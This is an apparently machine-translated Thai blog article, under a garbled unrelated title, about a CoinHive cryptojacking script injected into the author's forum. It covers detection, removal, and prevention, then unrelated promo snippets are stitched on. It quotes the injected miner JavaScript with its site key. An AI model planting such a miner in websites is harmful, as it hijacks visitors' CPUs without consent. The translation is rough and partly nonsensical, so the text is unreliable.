เพลง๠ดนซ์มาใหม่2017เบส๠น่นฟังà
สารบัญ:
ฉันได้อ่านเกี่ยวกับเจ้าของเว็บไซต์ที่ใช้สคริปต์ในเว็บไซต์ของตนที่ใช้ CPU ของคอมพิวเตอร์ของผู้เข้าชมเมื่อเข้าชมเว็บไซต์ของตน ความคิดคือการสร้างรายได้จากเนื้อหาของพวกเขาดังนั้นแทนที่จะใช้โฆษณาจะใช้สคริปต์ที่ทำงานในเบราว์เซอร์และใช้ทรัพยากรคอมพิวเตอร์ของผู้ใช้ในการเข้ารหัสลับของฉัน cryptocurrency แต่ฉันเคยคิดว่าเจ้าของเว็บไซต์เพียงคนเดียวเท่านั้นที่ทำเช่นนี้โดยการออกแบบ - ฉันไม่เคยคิดเลยว่าแฮกเกอร์จะแฮ็กเว็บไซต์และผลักดันสคริปต์ไปยังเว็บไซต์อื่น ๆ และใช้ผู้เข้าชม CPU เพื่อสร้างรายได้ด้วยตัวเอง
Coinhive crypto-mining script
เมื่อวานนี้เมื่อฉันเข้าเยี่ยมชมฟอรัม TWC ซึ่งทำงานบนซอฟต์แวร์ vBulletin ซอฟต์แวร์รักษาความปลอดภัยของฉันได้สร้างคำเตือนนี้ขึ้น:
// coinhive dot com /lib/coinhive.js ตรวจพบไฟล์วัตถุที่ถูกบล็อก
ฉันมักจะไปที่ฟอรัมทุกวันและฉันไม่เคยเห็นมันเมื่อวันก่อน ดังนั้นผมจึงสันนิษฐานว่าเหตุการณ์นี้เกิดขึ้นในช่วงเวลากลางคืนเวลาที่ฉันนอนหลับ
ฉันใช้ซอฟต์แวร์ vBulletin สำหรับฟอรัมและได้รับการอัปเดตเป็นเวอร์ชันล่าสุด นอกจากนี้โดเมนของ TheWindowsClub.com ยังใช้ Sucuri Web Antivirus และ Firewall เพื่อป้องกันตัวเองจากภัยคุกคามและการโจมตีทางเว็บออนไลน์
ซอฟต์แวร์รักษาความปลอดภัยของ My PC ได้หยุดการทำงานของสคริปต์ที่เป็นอันตรายแล้ว บนคอมพิวเตอร์ที่ใช้ Windows 10 ของฉัน ฉันได้ตรวจสอบกับเบราว์เซอร์อื่น ๆ เช่น Chrome & Edge แล้วผลลัพธ์ก็เหมือนกัน
หลังจากคลิกขวาบนหน้าเว็บฟอรัมและตรวจสอบซอร์สโค้ดฉันพบว่าสคริปต์ที่เป็นอันตรายของ CoinHive CryptoMiner
นี่คือ Coinhive Javascript ที่เป็นอันตรายซึ่งมีโค้ดฟอรัมของฉัน:
var miner = new CoinHive.Anonymous ("FG1d35B2h5xqzgJW0bbfyHT22ud9RnEm"); miner.start ();
สิ่งแรกที่ฉันทำคือการใช้ ฟอรั่มลงและแจ้ง Sucuri
คน Sucuri ทำความสะอาดฟอรั่มของสคริปต์ Coinhive ซึ่งได้มีการผลักดันเข้าสู่ฟอรัมของฉันภายในไม่กี่ชั่วโมงและทั้งหมด ดี
CoinHive
Coinhive เสนออะไร ผู้ขุด JavaScript สำหรับ Monero cryptocurrency ที่คุณสามารถฝังลงในเว็บไซต์ของคุณและใช้ซีพียูของผู้เยี่ยมชมเว็บไซต์เพื่อส่งเหรียญให้กับคุณ
นี่เรียกว่า Cryptojacking ซึ่งเกี่ยวข้องกับการแย่งชิงเบราว์เซอร์ของผู้ใช้สำหรับการทำเหมืองข้อมูล cryptocurrency เจ้าของเว็บไซต์บางรายอาจใช้มันเองเพื่อสร้างรายได้ - แต่ในกรณีของเราได้มีการฉีดยา
เมื่อผู้ใช้เข้าถึงไซต์ที่ติดไวรัส Coinhive JavaScript จะรันและทำเหมือง Monero โดยใช้ทรัพยากร CPU ของผู้ใช้ ซึ่งอาจนำไปสู่การควบคุม CPU และความล้มเหลวของระบบที่ไม่คาดคิดของเครื่องของเหยื่อ
ขณะนี้ถ้าเบราว์เซอร์ของคุณติดไวรัสคุณจะเห็นการใช้ทรัพยากรของคุณเพิ่มขึ้น ปิดเบราว์เซอร์และจะปิดลง ผู้ใช้อาจสังเกตเห็นว่าเครื่องของเขาร้อนขึ้นพัดลมทำงานได้เร็วหรือแบตเตอรี่หมดเร็ว
ฉันถามเพื่อนร่วมงานของฉัน Saurabh Mukhekar เยี่ยมชมฟอรัมของฉันโดยใช้ Mac และดูว่าเกิดอะไรขึ้น ดีคอมพิวเตอร์ Mac ของเขาได้รับผลกระทบมากเกินไปเมื่อเขาเปิดเวทีกับ Safari! เขาเป็นหนึ่งในผู้ใช้ Mac OSX ที่ฉลาดที่ใช้ซอฟต์แวร์ป้องกันไวรัสสำหรับ Mac ของเขา โปรแกรมป้องกันไวรัส Avast ของเขาสำหรับ Mac ได้หยุดการทำงานของสคริปต์ที่เป็นอันตรายแล้ว
Said Saurabh,
มัลแวร์ CoinHive ไม่เพียง แต่แย่งชิงพีซีที่ใช้ Windows แต่ยังเป็นของ Mac ด้วยเช่นกันเนื่องจากการติดตั้งจาวาสคริปต์บนเบราเซอร์ ดีฉันไม่เชื่อในตำนานที่ Macs ไม่จำเป็นต้องมีซอฟต์แวร์ป้องกันไวรัสอื่นเครื่องของฉันจะได้รับการติดเชื้อและ Mac ของฉันจะยังคงปั่นเหรียญออกสำหรับคนอื่น
ป้องกัน CoinHive จากการติดไวรัสเว็บไซต์ของคุณ
- อัปเดต CMS ของคุณเป็นเวอร์ชันล่าสุด
- อัปเดตซอฟต์แวร์โฮสติ้งของคุณเป็นประจำ (PHP, Database, etc …)
- อย่าใช้ NULL templates หรือ plugins ในเว็บไซต์ / forum ของคุณ
- รักษาความปลอดภัยเว็บไซต์ของคุณกับผู้ให้บริการรักษาความปลอดภัยเว็บเช่น Sucuri, Cloudflare, Wordfence ฯลฯ
- ใช้ความระมัดระวังพื้นฐานในการรักษาความปลอดภัยในบล็อกของคุณ
การกำจัดเหมือง CoinHive จากเว็บไซต์
ก่อนอื่นคุณต้องเป็นเว็บมาสเตอร์ของ หรือมีข้อมูลรับรองผู้ดูแลระบบที่ให้คุณเข้าถึงไฟล์เว็บไซต์ทั้งหมด
ตอนนี้เมื่อโปรแกรมป้องกันไวรัสของคุณตรวจพบการติดเชื้อ CoinHive ให้คลิกขวาที่หน้าเว็บและเลือก View Source Code กด Ctrl + F และค้นหา "CoinHive"
เมื่อคุณระบุตำแหน่งของโค้ดที่เป็นอันตรายคุณจะต้องดูตำแหน่งของไฟล์ - ตำแหน่งนี้อยู่ที่ไหน ตอนนี้คุณจำเป็นต้องลบออกด้วยตนเอง ในการทำเช่นนี้คุณต้องมีความรู้เกี่ยวกับโค้ดของแพลตฟอร์มของคุณ คุณจะต้องค้นหาไฟล์ที่ติดไวรัส / s และลบสคริปต์ข้างต้นออกด้วยตนเอง หากคุณไม่แน่ใจเกี่ยวกับเรื่องนี้โปรดขอให้ผู้เชี่ยวชาญบางคนดำเนินการ เนื่องจากเราใช้ Sucuri เราจึงปล่อยให้มันทำ
หลังจากทำเช่นนี้ให้ล้างเซิร์ฟเวอร์และแคชของเบราเซอร์ หากคุณกำลังใช้ปลั๊กอินแคชใด ๆ หรือพูด MaxCDN ให้ล้างแคชเหล่านั้นด้วย
ป้องกันตัวเองจากสคริปต์การทำเหมืองข้อมูลลับ
Cryptocurrencies & Blockchain technology กำลังดำเนินอยู่ทั่วโลก กำลังก่อให้เกิดผลกระทบต่อเศรษฐกิจโลกและก่อให้เกิดปัญหาเรื่องเทคโนโลยีเช่นกัน ทุกคนเริ่มมุ่งเน้นไปที่ตลาดที่ร่ำรวยเช่นนี้ซึ่งรวมถึงแฮกเกอร์เว็บไซต์ด้วย เนื่องจากผลตอบแทนที่เพิ่มขึ้นเราควรคาดหวังให้ใช้เทคโนโลยีดังกล่าวในทางที่ผิด นั่นคือด้านมืดของเทคโนโลยีที่เกิดขึ้นใหม่ใด ๆ
สิ่งที่เราสามารถทำได้คือการใช้มาตรการป้องกันที่ดีที่สุดตลอดเวลา นอกเหนือจากการใช้ซอฟต์แวร์รักษาความปลอดภัยที่ดีให้ใช้ส่วนขยาย Chrome หรือ Firefox ที่บล็อกเว็บไซต์จากการใช้ CPU ของคุณไปยัง Cryptocurrency หรือดีกว่าให้ใช้ Anti-WebMiner ที่จะหยุดการโจมตี Cryptojacking Mining Script โดยการแก้ไขไฟล์ Hosts ของคุณ ใช้งานได้กับเบราว์เซอร์ทั้งหมด หากคุณเป็นผู้ใช้ Mac โปรดรับซอฟต์แวร์ป้องกันไวรัสสำหรับคอมพิวเตอร์ของคุณด้วย
ในกรณีที่มีข้อสงสัยมากมายหากคุณรู้สึกว่าคุณอาจเคยเข้าชมไซต์ที่ติดไวรัสแล้วควรล้างเบราว์เซอร์ของคุณออก แคชและสแกนเครื่องของคุณด้วยซอฟต์แวร์ป้องกันไวรัสเช่นเดียวกับ AdwCleaner
รักษาความปลอดภัยให้พักการแจ้งเตือน!
เพิ่มความปลอดภัยอีกชั้นหนึ่งด้วย Script Defender
ปกป้องคอมพิวเตอร์ของคุณโดยการปิดกั้นสคริปต์ที่อาจเป็นอันตราย
คุณอาจเคยได้ยินเกี่ยวกับ Ransomware WannaCrypt และ NotPetya ที่เผยแพร่ไปทั่วอินเทอร์เน็ต crypto-ransomware สร้างเครือข่ายของคุณผ่านอินเทอร์เน็ตและคอมพิวเตอร์ที่มีช่องโหว่ในเครือข่ายของคุณ การคุ้มครอง ransomware ไม่จำเป็น แต่จำเป็นวันนี้หรือคุณจะจ่ายเงินค่าไถ่หรือสูญเสียข้อมูลของคุณ
องค์กรขนาดใหญ่ที่มีทีม IT สามารถจัดการกับสถานการณ์เหล่านี้ได้อย่างง่ายดายด้วยความช่วยเหลือของผู้เชี่ยวชาญ แต่มัลแวร์เหล่านี้ทำให้เกิดปัญหากับเจ้าของธุรกิจขนาดเล็กและแม้แต่กับคอมพิวเตอร์ส่วนบุคคล ในบทความนี้เราได้พูดถึง
การลบ Searchguide Level 3 Browser Hijacker
Searchguide.level3.com เป็นเครื่องมือไฮแจ็คเกอร์ที่อาจเป็นอันตรายต่อคอมพิวเตอร์ Windows ของคุณ เรียนรู้วิธีการลบ Searchguide Level 3 ออกจากระบบคอมพิวเตอร์ของคุณอย่างสมบูรณ์